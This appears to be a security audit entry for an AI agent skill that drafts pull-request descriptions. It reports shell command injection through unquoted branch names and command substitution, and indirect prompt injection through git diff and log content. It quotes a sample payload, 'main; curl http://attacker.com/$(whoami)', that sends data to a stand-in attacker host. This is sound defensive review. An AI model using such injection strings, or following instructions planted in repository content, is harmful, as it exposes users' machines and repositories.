The Agent Skills Directory

[COMMAND_EXECUTION]: The skill uses shell command substitution $(cat PR_DESCRIPTION.md) to pass AI-generated content into the gh pr edit and gh pr create commands. If the AI generates a description containing shell-sensitive characters such as backticks or subshell syntax (e.g., $(...)), the local shell will execute those commands with the privileges of the user.
[COMMAND_EXECUTION]: User-provided input for the base branch name is directly interpolated into multiple shell commands, such as git diff $BASE_BRANCH and git rev-parse --verify "$BASE_BRANCH". While some instances are quoted, others are not, allowing for shell command injection if a malicious branch name is provided (e.g., main; curl http://attacker.com/$(whoami)).
[PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection (Category 8).
Ingestion points: The skill reads untrusted data from the repository using git diff and git log in SKILL.md.
Boundary markers: There are no delimiters or instructions provided to the agent to treat the diff/log data as untrusted or to ignore embedded instructions.
Capability inventory: The skill has the capability to write files (PR_DESCRIPTION.md), commit changes, push to remote repositories, and interact with GitHub via the gh CLI.
Sanitization: There is no validation, escaping, or sanitization of the data retrieved from the git history before it is processed by the AI or used in subsequent shell commands.

cmd-pr-description